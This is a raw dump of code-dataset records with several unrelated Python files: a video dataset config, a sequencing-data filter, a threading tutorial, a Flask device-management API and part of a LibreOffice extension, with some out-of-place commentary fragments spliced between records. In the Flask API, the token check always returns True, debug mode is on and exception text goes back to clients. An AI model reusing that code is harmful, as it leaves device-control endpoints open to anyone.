True:\n transform_train = video.VideoGroupValTransform(size=(224, 224), mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n train_dataset = VideoClsCustom(root=root,\n setting=video_path,\n train=False,\n test_mode=True,\n #num_segments=3,\n new_length=8,\n transform=transform_train,\n #video_loader=True,\n #use_decord=True\n )\n print('Load %d testing samples.' 
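# initGui() above enables the history button only when the stored DB setting
# is truthy; a sketch of that read (key name taken from the code, runnable
# only inside QGIS where qgis.PyQt is importable). Note that an empty string
# stored under the key would also leave the button disabled.
from qgis.PyQt.QtCore import QSettings

defined_db = QSettings().value("HistorisationSITN/DB", None)
enable_button = bool(defined_db)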
% len(train_dataset))\n return train_dataset\n\n","sub_path":"for_application/video_config.py","file_name":"video_config.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"441298121","text":"### Author Douwe Spaanderman - 27 May 2020 ###\n\n# This script runs the whole prefiltering of Terra workspace data depending on which Arguments are inserted\n\n# Libraries\nimport pandas as pd\nimport os\nimport numpy as np\nfrom pathlib import Path\nimport argparse\nimport time\n\ndef read_terra(input_loc):\n '''\n read the tsv file from terra, make string columns for nan\n\n input:\n input_loc = Path object with the location\n\n output:\n terra workspace data\n '''\n data = pd.read_csv(input_loc, sep=\"\\t\", index_col=0)\n data[\"PANEL_renamed_bai_file\"] = [str(x) for x in data[\"PANEL_renamed_bai_file\"]]\n data[\"RNA_fastq1\"] = [str(x) for x in data[\"RNA_fastq1\"]]\n \n return data\n\ndef filter_nan_sequence(data, selection=\"PANEL\"):\n '''\n Filters out all rows which have NaN values for the selected sequencing information\n\n input:\n data = terra workspace data\n selection = any of the following: Panel/Wes/RNA/All\n\n output:\n filtered dataframe with only compleet cases\n '''\n if type(selection) == str:\n if selection.upper() == \"PANEL\":\n data = data[data[\"PANEL_renamed_bai_file\"] != 'nan']\n elif selection.upper() == \"RNA\":\n data = data[data[\"RNA_fastq1\"] != 'nan']\n elif selection.upper() == \"WES\":\n raise SyntaxError(\"Currently not implemented\")\n elif selection.upper() == \"ALL\":\n data = data[(data[\"PANEL_renamed_bai_file\"] != 'nan') & (data[\"RNA_fastq1\"] != 'nan')]\n else:\n raise NameError(f\"Implemented unused argument for filtering data, input was {selection}, but should be panel/wes/rna/all\")\n else:\n raise TypeError(\"filter_nan_sequencing was provided with a {}, while it should be a string\".format(type(selection)))\n\n return data\n\ndef datafilter(Path, Save=False, Filter=\"PANEL\"):\n '''\n Main script to run data filtering\n\n input:\n Path = location to terra workspace file\n Save = If to save and where (default is False)\n Filter = any of the following: Panel/Wes/RNA/All (default is Panel)\n\n output:\n filtered dataframe with only compleet cases\n '''\n\n data = read_terra(input_loc = Path)\n data = filter_nan_sequence(data=data, selection=Filter)\n\n if Save != False:\n if not Save.endswith(\".pkl\"):\n try:\n Save = Save + \"filtered.pkl\"\n except:\n os.mkdir(Save)\n Save = Save + \"filtered.pkl\"\n\n data.to_pickle(Save)\n\n return data\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"filter data\")\n parser.add_argument(\"Path\", help=\"path to terra workspace file\")\n parser.add_argument(\"-s\", dest=\"Save\", nargs='?', default=False, help=\"location of file\")\n parser.add_argument(\"-f\", dest=\"Filter\", nargs='?', default='PANEL', help=\"which sequencing you want to select (RNA/WES/PANEL)\")\n\n args = parser.parse_args()\n start = time.time()\n data = datafilter(Path=args.Path, Save=args.Save, Filter=args.Filter)\n end = time.time()\n print('completed in {} seconds'.format(end-start))","sub_path":"CellCulturePy/Preprocessing/data_filter.py","file_name":"data_filter.py","file_ext":"py","file_size_in_byte":3092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"469479387","text":"#!/usr/local/bin/python\n# a tutorial reproduced from 
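# filter_nan_sequence() above stringifies columns and compares against the
# literal 'nan'; pandas can state the same intent directly with notna()
# (a sketch on toy data, column names from the script):
import pandas as pd

df = pd.DataFrame({"PANEL_renamed_bai_file": ["a.bai", None],
                   "RNA_fastq1": [None, "r1.fq"]})
panel_only = df[df["PANEL_renamed_bai_file"].notna()]
both = df[df["PANEL_renamed_bai_file"].notna() & df["RNA_fastq1"].notna()]
assert len(panel_only) == 1 and both.empty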
https://pymotw.com/2/threading/\nimport logging, threading, time\n\nlogging.basicConfig(level=logging.DEBUG, format='%(asctime)s (%(threadName)-2s) %(message)s', )\n\ndef consumer(cond):\n\t\"\"\"Waiting for the condition, then use the resource\"\"\"\n\tlogging.debug('Starting consumer thread')\n\tt = threading.currentThread()\n\twith cond:\n\t\tcond.wait()\n\t\tlogging.debug('Resource is available for the consumer')\n\ndef producer(cond):\n\t\"\"\"Set up the resource to be used by the consumer\"\"\"\n\tlogging.debug('Starting producer thread')\n\twith cond:\n\t\tlogging.debug('Making resource available')\n\t\tcond.notifyAll()\n\ncondition = threading.Condition()\n\nc1 = threading.Thread(name='c1', target=consumer, args=(condition,))\nc2 = threading.Thread(name='c2', target=consumer, args=(condition,))\np = threading.Thread(name='p', target=producer, args=(condition,))\n\nc1.start()\ntime.sleep(2)\nc2.start()\ntime.sleep(2)\np.start()\n\n\n","sub_path":"multithreading/threading_condition_synchronize.py","file_name":"threading_condition_synchronize.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"192113197","text":"from flask import Flask, request, jsonify, send_file\nfrom flask_httpauth import HTTPTokenAuth\nfrom fileUtil import image_monitor_device, convert_image_to_base64\nfrom dateUtil import get_current_date_str, get_current_short_date_str, set_time\nfrom dbUtil import modify_configuration_value, get_config_value, insert_download_code, count_available_download_codes, maintenance_token_exists, get_used_codes, get_used_codes_without_downloads, mark_codes_as_sent, get_config_value\nfrom logger import latest_log_activity, log_info, log_error\nimport time\nimport json\n\nAPI_MANAGEMENT_PORT = 0\nPATH_VIDEO_LOCALIZATION = ''\nPATH_PICTURES_LOCALIZATION = ''\n\n#Constantes de la base de datos\ndef update_variables():\n global API_MANAGEMENT_PORT\n global PATH_VIDEO_LOCALIZATION\n global PATH_PICTURES_LOCALIZATION\n API_MANAGEMENT_PORT = int(get_config_value(\"API_MANAGEMENT_PORT\"))\n PATH_VIDEO_LOCALIZATION = get_config_value(\"VIDEO_LOCALIZATION_PATH\")\n PATH_PICTURES_LOCALIZATION = get_config_value(\"PICTURES_LOCALIZATION_PATH\")\n\napp = Flask(__name__)\nauth = HTTPTokenAuth('Token')\n\n\n#172.24.1.1:5002/getTime\n@app.route('/getTime', methods=['GET', 'POST'])\n@auth.login_required\ndef get_time():\n try:\n email = request.form.get(\"email\")\n log_info(email, 'MANAGEMENT', 'apiManagement.py - get_time()')\n\n response = {\n \"status\":\"ok\",\n \"currentTime\": time.strftime('%H') + \":\" + time.strftime('%M')}\n return jsonify(response)\n except Exception as e:\n email = request.form.get(\"email\")\n log_error(email, 'MANAGEMENT', 'apiManagement.py - get_time()', str(e))\n response = {\n \"status\":\"error\",\n \"error\":\"errorGettingTime\",\n \"errorMessage\":\"No se pudo obtener la hora del dispositivo\",\n \"exception\":str(e)}\n return jsonify(response)\n\n\n#172.24.1.1:5002/postTime\n@app.route('/postTime', methods=['POST'])\n@auth.login_required\ndef post_time():\n try:\n email = request.form.get(\"email\")\n log_info(email, 'MANAGEMENT', 'apiManagement.py - post_time()')\n\n hora = request.form.get(\"time\")\n horaPI = hora.split(':')[0]\n minutosPI = hora.split(':')[1]\n set_time(horaPI, minutosPI)\n response = {\n \"status\":\"ok\",\n \"newTime\":time.strftime('%H') + \":\" + time.strftime('%M')}\n return jsonify(response)\n except Exception as e:\n email = 
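# The same producer/consumer handshake as the tutorial above, but with the
# PEP 8 spellings (notifyAll/currentThread are legacy aliases) and wait_for,
# which retests a predicate and so cannot miss an early notify:
import threading

cond = threading.Condition()
ready = []

def consumer():
    with cond:
        cond.wait_for(lambda: ready)
        print("consumed", ready[0])

t = threading.Thread(target=consumer)
t.start()
with cond:
    ready.append("resource")
    cond.notify_all()
t.join()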
request.form.get(\"email\")\n log_error(email, 'MANAGEMENT', 'apiManagement.py - post_time()', str(e))\n response = {\n \"status\":\"error\",\n \"error\":\"errorSettingTime\",\n \"errorMessage\":\"No se pudo modificar la hora del dispositivo\",\n \"exception\":str(e)}\n return jsonify(response)\n\n \n#172.24.1.1:5002/changeRecordingTimes\n@app.route('/setRecordingTimes', methods=['POST'])\n@auth.login_required\ndef set_recording_times():\n try:\n email = request.form.get(\"email\")\n log_info(email, 'MANAGEMENT', 'apiManagement.py - set_recording_times()')\n \n startTime = request.form.get(\"startTime\")\n endTime = request.form.get(\"endTime\")\n modify_configuration_value(\"START_RECORDING_TIME\", startTime)\n modify_configuration_value(\"FINISH_RECORDING_TIME\", endTime)\n response = {\"status\":\"ok\"}\n return jsonify(response)\n except Exception as e:\n email = request.form.get(\"email\")\n log_error(email, 'MANAGEMENT', 'apiManagement.py - set_recording_times()', str(e))\n response = {\n \"status\":\"error\",\n \"error\":\"errorChangingRecordingTimes\",\n \"errorMessage\":\"No se pudo modificar las horas de grabacion\",\n \"exception\":str(e)}\n return jsonify(response)\n\n \n#172.24.1.1:5002/getRecordingTimes\n@app.route('/getRecordingTimes', methods=['POST'])\n@auth.login_required\ndef get_recording_times():\n try:\n email = request.form.get(\"email\")\n log_info(email, 'MANAGEMENT', 'apiManagement.py - get_recording_times()')\n \n startTime = get_config_value(\"START_RECORDING_TIME\")\n endTime = get_config_value(\"FINISH_RECORDING_TIME\")\n response = {\n \"status\":\"ok\",\n \"startTime\":startTime,\n \"endTime\":endTime}\n return jsonify(response)\n except:\n email = request.form.get(\"email\")\n log_error(email, 'MANAGEMENT', 'apiManagement.py - get_recording_times()', str(e))\n response = {\n \"status\":\"error\",\n \"error\":\"errorGettingRecordingTimes\",\n \"errorMessage\":\"No se pudo obtener las horas de grabacion\",\n \"exception\":str(e)}\n return jsonify(response)\n\n\n#172.24.1.1:5002/getImageMonitorDevice\n@app.route('/getImageMonitorDevice', methods=['GET', 'POST'])\n@auth.login_required\ndef get_image_monitor_device():\n try:\n email = request.form.get(\"email\")\n log_info(email, 'MANAGEMENT', 'apiManagement.py - get_image_monitor_device()')\n\n update_variables()\n picture_path = PATH_PICTURES_LOCALIZATION + get_current_date_str() + \".jpg\"\n video_directory = PATH_VIDEO_LOCALIZATION + get_current_short_date_str()\n image_monitor_device(video_directory, picture_path)\n encoded_string = convert_image_to_base64(picture_path)\n return jsonify({\"status\":\"ok\", \"base64Image\":encoded_string})\n except Exception as e:\n email = request.form.get(\"email\")\n log_error(email, 'MANAGEMENT', 'apiManagement.py - get_image_monitor_device()', str(e))\n return jsonify({\n \"status\":\"error\",\n \"error\":\"errorMonitoringDevice\",\n \"errorMessage\":\"Error inesperado\",\n \"exception\":str(e)})\n\n\n#172.24.1.1:5002/uploadCodes\n@app.route('/uploadCodes', methods=['GET', 'POST'])\n@auth.login_required\ndef upload_codes():\n try:\n email = request.form.get(\"email\")\n log_info(email, 'MANAGEMENT', 'apiManagement.py - upload_codes()')\n\n codes = json.loads(request.form.get(\"codes\"))\n for code in codes:\n insert_download_code(code['code'])\n return jsonify({\n \"status\":\"ok\",\n \"codes\":codes}) \n except Exception as e:\n email = request.form.get(\"email\")\n log_error(email, 'MANAGEMENT', 'apiManagement.py - upload_codes()', str(e))\n return jsonify({\n 
\"status\":\"error\",\n \"error\":\"errorUploadingCodes\",\n \"errorMessage\":\"Error inesperado\",\n \"exception\":str(e)})\n\n\n#172.24.1.1:5002/countCodes\n@app.route('/countCodes', methods=['GET', 'POST'])\n@auth.login_required\ndef count_codes():\n try:\n email = request.form.get(\"email\")\n log_info(email, 'MANAGEMENT', 'apiManagement.py - count_codes()')\n \n count = count_available_download_codes()\n ##TODO obtener deviceId \n deviceId = 1\n return jsonify({\n \"status\":\"ok\",\n \"count\":count,\n \"deviceId\":deviceId}) \n except Exception as e:\n email = request.form.get(\"email\")\n log_error(email, 'MANAGEMENT', 'apiManagement.py - count_codes()', str(e))\n return jsonify({\n \"status\":\"error\",\n \"error\":\"errorCountingAvailableCodes\",\n \"errorMessage\":\"Error inesperado\",\n \"exception\":str(e)})\n\n\n#172.24.1.1:5002/getSpaceLimits\n@app.route('/getSpaceLimits', methods=['POST'])\n@auth.login_required\ndef get_space_limits():\n try:\n email = request.form.get(\"email\")\n log_info(email, 'MANAGEMENT', 'apiManagement.py - get_space_limits()')\n \n startLimit = get_config_value(\"DISK_START_DELETE_SPACE\")\n endLimit = get_config_value(\"DISK_STOP_DELETE_SPACE\")\n min_space = request.form.get(\"min_space\")\n max_space = request.form.get(\"max_space\")\n response = {\n \"status\":\"ok\",\n \"startLimit\":startLimit,\n \"endLimit\":endLimit}\n return jsonify(response)\n except Exception as e:\n email = request.form.get(\"email\")\n log_error(email, 'MANAGEMENT', 'apiManagement.py - get_space_limits()', str(e))\n response = {\n \"status\":\"error\",\n \"error\":\"errorChangingSpaceLimits\",\n \"errorMessage\":\"No se pudo modificar los limites de espacio\",\n \"exception\":str(e)}\n return jsonify(response)\n\n \n#172.24.1.1:5002/setSpaceLimits\n@app.route('/setSpaceLimits', methods=['POST'])\n@auth.login_required\ndef set_space_limits():\n try:\n email = request.form.get(\"email\")\n log_info(email, 'MANAGEMENT', 'apiManagement.py - set_space_limits()')\n \n startLimit = int(request.form.get(\"startLimit\"))\n endLimit = int(request.form.get(\"endLimit\"))\n log_info(email, '***** startLimit', str(startLimit))\n log_info(email, '***** endLimit', str(endLimit))\n if(startLimit < endLimit):\n if(startLimit >= 1024):\n if(endLimit <= 15360):\n modify_configuration_value(\"DISK_START_DELETE_SPACE\", str(startLimit))\n modify_configuration_value(\"DISK_STOP_DELETE_SPACE\", str(endLimit))\n response = {\"status\":\"ok\"}\n else:\n response = {\n \"status\":\"error\",\n \"error\":\"invalidMaxLimit\",\n \"errorMessage\":\"El limite para terminar de borrar no puede ser superior a 15 GB\"}\n else:\n response = {\n \"status\":\"error\",\n \"error\":\"invalidMinLimit\",\n \"errorMessage\":\"El limite para empezar a borrar no puede ser menor a 1 GB\"}\n else:\n response = {\n \"status\":\"error\",\n \"error\":\"invalidValues\",\n \"errorMessage\":\"El limite para empezar a borrar debe ser menor al limite para terminar\"}\n return jsonify(response)\n except Exception as e:\n email = request.form.get(\"email\")\n log_error(email, 'MANAGEMENT', 'apiManagement.py - set_space_limits()', str(e))\n response = {\n \"status\":\"error\",\n \"error\":\"errorChangingSpaceLimits\",\n \"errorMessage\":\"No se pudo modificar los limites de espacio\",\n \"exception\":str(e)}\n return jsonify(response)\n\n\n#172.24.1.1:5002/downloadData\n@app.route('/downloadData', methods=['POST'])\n@auth.login_required\ndef download_data():\n try:\n email = request.form.get(\"email\")\n log_info(email, 
'MANAGEMENT', 'apiManagement.py - download_data()')\n \n usedCodes = get_used_codes()\n usedCodesWithoutDownloads = get_used_codes_without_downloads()\n logActivity = latest_log_activity()\n mark_codes_as_sent()\n response = {\n \"status\":\"ok\",\n \"usedCodes\":usedCodes,\n \"usedCodesWithoutDownload\":usedCodesWithoutDownloads,\n \"logActivity\":logActivity}\n return jsonify(response)\n except Exception as e:\n email = request.form.get(\"email\")\n log_error(email, 'MANAGEMENT', 'apiManagement.py - download_data()', str(e))\n response = {\n \"status\":\"error\",\n \"error\":\"errorDownloadingData\",\n \"errorMessage\":\"No se pudieron descargar los datos\",\n \"exception\":str(e)}\n return jsonify(response)\n \n@auth.verify_token\ndef verify_token(token):\n ##return maintenance_token_exists(token) \n return True\n \n\n@auth.error_handler\ndef auth_error():\n response = jsonify({\n \"status\":\"error\",\n \"error\":\"wrongToken\",\n \"errorMessage\":\"Usted no esta autorizado a realizar esta accion\"})\n response.status_code = 200\n return response\n\n\nif __name__ == '__main__':\n update_variables()\n app.run(debug=True, host='172.24.1.1', port=API_MANAGEMENT_PORT)\n","sub_path":"Scripts/apiManagement.py","file_name":"apiManagement.py","file_ext":"py","file_size_in_byte":11898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"31666742","text":"# -*- coding: utf-8 -*-\nimport uno\nimport unohelper\n\nfrom traceback import format_exc as tb\nimport sys\nimport os\nimport xml.etree.ElementTree as ElementTree\nimport time\nfrom codecs import open as codecs_open\nfrom math import floor as math_floor\nimport re\nimport konstanten as KONST\nimport copy\nimport inspect\nfrom pprint import pformat\nimport webbrowser\n\n\nplatform = sys.platform\n\n\n\nclass Menu_Bar():\n \n def __init__(self,args,tab = 'Projekt'):\n \n try:\n \n (pdk,\n dialog,\n ctx,\n tabsX,\n path_to_extension,\n win,\n dict_sb,\n debugX,\n factory,\n menu_start,\n logX,\n class_LogX,\n settings_organon) = args\n\n \n ###### DEBUGGING ########\n global debug,log,load_reload\n debug = debugX\n log = logX\n \n self.debug = debugX\n if self.debug: \n self.time = time\n self.timer_start = self.time.clock()\n \n # Wird beim Debugging auf True gesetzt \n load_reload = sys.dont_write_bytecode\n \n if self.debug: log(inspect.stack)\n \n \n ###### DEBUGGING END ########\n \n \n \n self.win = win\n self.pd = pdk\n global pd,IMPORTS,LANG\n pd = pdk\n \n global T\n T = Tab()\n \n \n \n \n \n # Konstanten\n self.factory = factory\n self.dialog = dialog\n self.ctx = ctx\n self.smgr = self.ctx.ServiceManager\n self.toolkit = self.smgr.createInstanceWithContext(\"com.sun.star.awt.Toolkit\", ctx) \n self.topWindow = self.toolkit.getActiveTopWindow() \n self.desktop = self.smgr.createInstanceWithContext( \"com.sun.star.frame.Desktop\",self.ctx)\n self.doc = self.get_doc() \n self.current_Contr = self.doc.CurrentController \n self.programm = self.get_office_name() \n self.undo_mgr = self.doc.UndoManager\n self.viewcursor = self.current_Contr.ViewCursor\n self.tabsX = tabsX\n self.platform = sys.platform\n self.language = None\n LANG = self.lade_Modul_Language()\n self.path_to_extension = path_to_extension\n self.programm_version = self.get_programm_version()\n self.filters_import = None\n self.filters_export = None\n self.BEREICH_EINFUEGEN = self.get_BEREICH_EINFUEGEN()\n self.anleitung_geladen = False\n self.speicherort_last_proj = self.get_speicherort()\n self.projekt_name = None\n 
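# projekt_name stays None until a project is opened; several listeners below use it as an 'is a project loaded?' guard\n        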
self.menu_start = menu_start\n self.sec_helfer = None\n \n \n \n # Properties\n self.props = {}\n self.props.update({T.AB :Props()})\n self.dict_sb = dict_sb # drei Unterdicts: sichtbare, eintraege, controls\n self.dict_sb_content = None\n \n self.tabs = {tabsX.ActiveTabID:(dialog,'Projekt')}\n self.active_tab_id = tabsX.ActiveTabID\n self.tab_id_old = self.active_tab_id\n self.registrierte_maus_listener = []\n self.maus_fenster = None\n self.mausrad_an = False\n self.texttools_geoeffnet = False\n \n # Settings\n self.settings_orga = settings_organon\n self.settings_exp = None\n self.settings_imp = None\n self.settings_proj = {}\n self.user_styles = ()\n \n # Pfade\n self.pfade = {}\n \n IMPORTS = {'uno':uno,\n 'unohelper':unohelper,\n 'sys':sys,\n 'os':os,\n 'ElementTree':ElementTree,\n 'time':time,\n 'codecs_open':codecs_open,\n 'math_floor':math_floor,\n 're':re,\n 'tb':tb,\n 'platform':platform,\n 'KONST':KONST,\n 'pd':pd,\n 'copy':copy,\n 'Props':Props,\n 'T':T,\n 'log':log,\n 'inspect':inspect,\n 'webbrowser':webbrowser,\n 'LANG':LANG}\n \n \n # Klassen \n self.Key_Handler = Key_Handler(self)\n self.ET = ElementTree \n self.nachricht = Mitteilungen(self.ctx,self).nachricht\n \n self.class_Baumansicht,self.class_Zeilen_Listener = self.get_Klasse_Baumansicht()\n self.class_Projekt = self.lade_modul('projects','Projekt') \n self.class_XML = self.lade_modul('xml_m','XML_Methoden')\n self.class_Funktionen = self.lade_modul('funktionen','Funktionen') \n self.class_Export = self.lade_modul('export','Export')\n self.class_Import = self.lade_modul('importX','ImportX') \n self.class_Sidebar = self.lade_modul('sidebar','Sidebar') \n self.class_Bereiche = self.lade_modul('bereiche','Bereiche')\n self.class_Version = self.lade_modul('version','Version') \n self.class_Tabs = self.lade_modul('tabs','Tabs') \n self.class_Latex = self.lade_modul('latex_export','ExportToLatex') \n self.class_Html = self.lade_modul('export2html','ExportToHtml') \n self.class_Zitate = self.lade_modul('zitate','Zitate') \n self.class_werkzeug_wListe= self.lade_modul('werkzeug_wListe','WListe') \n self.class_Index = self.lade_modul('index','Index')\n self.class_Mausrad = self.lade_modul('mausrad','Mausrad')\n self.class_Einstellungen = self.lade_modul('einstellungen','Einstellungen')\n self.class_Organon_Design = self.lade_modul('design','Organon_Design')\n self.class_Organizer = self.lade_modul('organizer','Organizer')\n \n # Plattformabhaengig\n if self.platform == 'win32':\n self.class_RawInputReader = self.lade_modul('rawinputdata','RawInputReader')\n \n self.class_Log = class_LogX\n self.class_Design = Design()\n self.class_Gliederung = Gliederung()\n \n #self.class_Greek = self.lade_modul('greek2latex','.Greek(self,pd)')\n \n # Listener \n self.VC_selection_listener = ViewCursor_Selection_Listener(self) \n self.w_listener = Dialog_Window_Listener(self) \n self.undo_mgr_listener = Undo_Manager_Listener(self)\n self.tab_listener = Tab_Listener(self)\n #self.listener_top_window = Top_Window_Listener(self)\n \n self.Listener = {}\n self.Listener.update( {'Menu_Leiste_Listener': Menu_Leiste_Listener(self)} )\n self.Listener.update( {'Menu_Leiste_Listener2': Menu_Leiste_Listener2(self)} )\n self.Listener.update( {'ScrollBar': ScrollBar_Listener} )\n \n self.undo_mgr.addUndoManagerListener(self.undo_mgr_listener)\n self.dialog.addWindowListener(self.w_listener)\n self.dialog.AccessibleContext.AccessibleParent.addEventListener(self.w_listener)\n self.tabsX.addTabListener(self.tab_listener)\n \n self.use_UM_Listener = 
False\n \n \n \n \n # UD_properties = self.doc.DocumentProperties.UserDefinedProperties\n\n\n except:\n logX(inspect.stack,tb())\n \n # fehlt:\n # Den User ueber den Fehler benachrichtigen\n \n \n \n def get_doc(self):\n if self.debug: log(inspect.stack)\n \n enum = self.desktop.Components.createEnumeration()\n comps = []\n \n while enum.hasMoreElements():\n comps.append(enum.nextElement())\n \n # Wenn ein neues Dokument geoeffnet wird, gibt es bei der Initialisierung\n # noch kein Fenster, aber die Komponente wird schon aufgefuehrt.\n # Hat die zuletzt erzeugte Komponente comps[0] kein ViewData,\n # dann wurde sie neu geoeffnet.\n if comps[0].ViewData == None:\n doc = comps[0]\n else:\n doc = self.desktop.getCurrentComponent() \n \n return doc\n \n def get_office_name(self):\n if self.debug: log(inspect.stack)\n \n frame = self.current_Contr.Frame\n if 'LibreOffice' in frame.Title:\n programm = 'LibreOffice'\n elif 'OpenOffice' in frame.Title:\n programm = 'OpenOffice'\n else:\n # Fuer Linux / OSX fehlt\n programm = 'LibreOffice'\n \n return programm\n \n def get_BEREICH_EINFUEGEN(self):\n if self.debug: log(inspect.stack)\n \n UM = self.doc.UndoManager\n newSection = self.doc.createInstance(\"com.sun.star.text.TextSection\")\n cur = self.doc.Text.createTextCursor() \n cur.gotoEnd(False)\n self.doc.Text.insertTextContent(cur, newSection, False)\n BEREICH_EINFUEGEN = UM.getCurrentUndoActionTitle()\n cur.gotoRange(newSection.Anchor,True)\n newSection.dispose()\n cur.setString('')\n return BEREICH_EINFUEGEN\n \n def get_programm_version(self):\n if self.debug: log(inspect.stack)\n \n pip = self.ctx.getByName(\"/singletons/com.sun.star.deployment.PackageInformationProvider\")\n for ext in pip.ExtensionList:\n if ext[0] == 'xaver.roemers.organon':\n version = ext[1]\n \n return version\n \n def erzeuge_Menu(self,win):\n if self.debug: log(inspect.stack)\n \n try: \n listener = Menu_Leiste_Listener(self) \n listener2 = Menu_Leiste_Listener2(self) \n \n # CONTAINER\n menuB_control, menuB_model = self.createControl(self.ctx, \"Container\", 2, 2, 1000, 20, (), ()) \n menuB_model.BackgroundColor = KONST.FARBE_MENU_HINTERGRUND\n \n win.addControl('Organon_Menu_Bar', menuB_control)\n \n bereich = self.props[T.AB].selektierte_zeile_alt\n \n Menueintraege = [\n (LANG.FILE,'a'),\n (LANG.BEARBEITEN_M,'a'),\n (LANG.ANSICHT,'a'), \n ('Ordner','b',KONST.IMG_ORDNER_NEU_24,LANG.INSERT_DIR),\n ('Datei','b',KONST.IMG_DATEI_NEU_24,LANG.INSERT_DOC),\n #('Speichern','b','vnd.sun.star.extension://xaver.roemers.organon/img/papierkorb_leeren.png',LANG.CLEAR_RECYCLE_BIN)\n ('Speichern','b','vnd.sun.star.extension://xaver.roemers.organon/img/lc_save.png',\n LANG.FORMATIERUNG_SPEICHERN.format(LANG.KEINE))\n ]\n \n x = 0\n \n # SPRACHE\n for eintrag in Menueintraege:\n if eintrag[1] == 'a':\n \n control, model = self.createControl(self.ctx, \"FixedText\", x, 2, 0, 20, (), ()) \n model.Label = eintrag[0] \n model.TextColor = KONST.FARBE_MENU_SCHRIFT\n control.addMouseListener(listener)\n breite = control.getPreferredSize().Width\n control.setPosSize(0,0,breite,0,4)\n \n menuB_control.addControl(eintrag[0], control)\n \n x += breite + 5\n \n x += 15\n\n # ICONS\n for eintrag in Menueintraege:\n if eintrag[1] == 'b': \n \n h = 0\n \n if T.AB != 'Projekt':\n if eintrag[0] in ('Ordner','Datei'):\n x += 22\n continue \n \n if eintrag[0] == 'Speichern':\n x += 20\n h = -2\n \n control, model = self.createControl(self.ctx, \"ImageControl\", x, 0 - h * .5, 20 + h, 20 + h, (), ()) \n model.ImageURL = eintrag[2]\n model.HelpText = 
eintrag[3]\n model.Border = 0 \n control.addMouseListener(listener2) \n \n menuB_control.addControl(eintrag[0], control) \n \n x += 22\n # TEST\n if load_reload:\n control, model = self.createControl(self.ctx, \"FixedText\", x+30, 2, 50, 20, (), ()) \n model.Label = 'Test' \n control.addMouseListener(listener)\n \n menuB_control.addControl('Test', control)\n\n except Exception as e:\n self.nachricht('erzeuge_Menu ' + str(e),\"warningbox\")\n log(inspect.stack,tb())\n\n \n def erzeuge_Menu_DropDown_Eintraege(self,items):\n if self.debug: log(inspect.stack)\n\n controls = []\n SEPs = []\n \n xBreite = 0\n y = 10\n \n listener = Auswahl_Menu_Eintrag_Listener(self)\n \n for item in items:\n \n if item != 'SEP':\n prop_names = ('Label',)\n prop_values = (item,)\n control, model = self.createControl(self.ctx, \"FixedText\", 30, y, 50,50, prop_names, prop_values)\n\n prefSize = control.getPreferredSize()\n \n Hoehe = prefSize.Height \n Breite = prefSize.Width + 10\n control.setPosSize(0,0,Breite ,Hoehe,12)\n \n control.addMouseListener(listener)\n \n if item == LANG.TEXTTOOLS:\n prop_names = ('ImageURL','Border')\n prop_values = ('vnd.sun.star.extension://xaver.roemers.organon/img/pfeil2.png',0)\n controlTexttools, modelT = self.createControl(self.ctx, \"ImageControl\", Breite , y+5, 4,6, prop_names, prop_values)\n controls.append(controlTexttools)\n \n if xBreite < Breite:\n xBreite = Breite\n \n y += Hoehe\n \n else:\n \n # Waagerechter Trenner\n control, model = self.createControl(self.ctx, \"FixedLine\", 30, y, 50,10,(),())\n model.TextColor = 0\n model.TextLineColor = 0\n SEPs.append(control)\n y += 10\n\n controls.append(control)\n \n \n # Senkrechter Trenner\n control, model = self.createControl(self.ctx, \"FixedLine\", 20, 10, 5,y -10 ,(),())\n controls.append(control)\n model.Orientation = 1\n\n for sep in SEPs:\n sep.setPosSize(0,0,xBreite ,0,4)\n \n try:\n controlTexttools.setPosSize(xBreite +30,0,0 ,0,1)\n except:\n pass\n \n return controls,listener,y - 5,xBreite +20\n\n\n def erzeuge_Menu_DropDown_Eintraege_Ansicht(self,items):\n if self.debug: log(inspect.stack)\n try:\n controls = []\n SEPs = []\n\n if self.projekt_name != None:\n tag1 = self.settings_proj['tag1']\n tag2 = self.settings_proj['tag2']\n tag3 = self.settings_proj['tag3']\n else:\n tag1 = 0\n tag2 = 0\n tag3 = 0\n \n xBreite = 0\n y = 10\n \n listener = Auswahl_Menu_Eintrag_Listener(self)\n tag_TV_listener = DropDown_Tags_TV_Listener(self)\n tag_SB_listener = DropDown_Tags_SB_Listener(self)\n \n\n for item in items:\n\n if item[0] != 'SEP':\n prop_names = ('Label',)\n prop_values = (item[0],)\n control, model = self.createControl(self.ctx, \"FixedText\", 30, y, 50,50, prop_names, prop_values)\n # Image\n control_I, model_I = self.createControl(self.ctx, \"ImageControl\", 5, y, 16,16, (), ())\n model_I.Border = 0\n \n prefSize = control.getPreferredSize()\n \n Hoehe = prefSize.Height \n Breite = prefSize.Width +15\n control.setPosSize(0,0,Breite ,Hoehe,12)\n \n if item[1] == 'Ueberschrift':\n model.FontWeight = 150\n \n \n elif item[1] == '' and item[0] != 'SEP':\n control.addMouseListener(listener)\n \n \n elif item[1] == 'Tag_TV':\n \n control.addMouseListener(tag_TV_listener)\n\n if self.projekt_name != None:\n sett = self.settings_proj\n tag1,tag2,tag3 = sett['tag1'],sett['tag2'],sett['tag3']\n else:\n tag1,tag2,tag3 = 0,0,0\n\n if item[0] == LANG.SHOW_TAG1 and tag1 == 1:\n model_I.ImageURL = 'private:graphicrepository/svx/res/apply.png'\n elif item[0] == LANG.SHOW_TAG2 and tag2 == 1:\n model_I.ImageURL = 
